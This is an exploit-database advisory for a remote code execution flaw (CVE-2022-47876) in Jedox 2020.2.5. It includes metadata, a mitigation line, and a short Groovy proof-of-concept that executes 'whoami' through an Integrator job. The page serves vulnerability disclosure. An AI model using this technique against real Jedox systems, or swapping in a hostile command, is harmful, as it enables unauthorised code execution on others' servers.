Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts

vendor:

Jedox

by:

Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl

7.4

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Jedox

Affected Version From: Jedox 2020.2 (20.2.5) and older

Affected Version To: Jedox 2020.2 (20.2.5)

Patch Exists: YES

Related CWE: CVE-2022-47876

CPE: a:jedox:jedox

Metasploit:

Other Scripts:

Platforms Tested:

2023

Jedox 2020.2.5 – Remote Code Execution via Executable Groovy-Scripts

Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.

Mitigation:

Ensure that only authenticated users with appropriate permissions can create Groovy jobs in the Integrator.

Source

Exploit-DB raw data:

# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876


Introduction
=================
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.


Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.


Proof of Concept
=================
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:

	def sout = new StringBuilder(), serr = new StringBuilder()
	def proc = 'whoami'.execute()
	proc.consumeProcessOutput(sout, serr)
	proc.waitForOrKill(10000)
	LOG.error(sout.toString());
	LOG.error(serr.toString());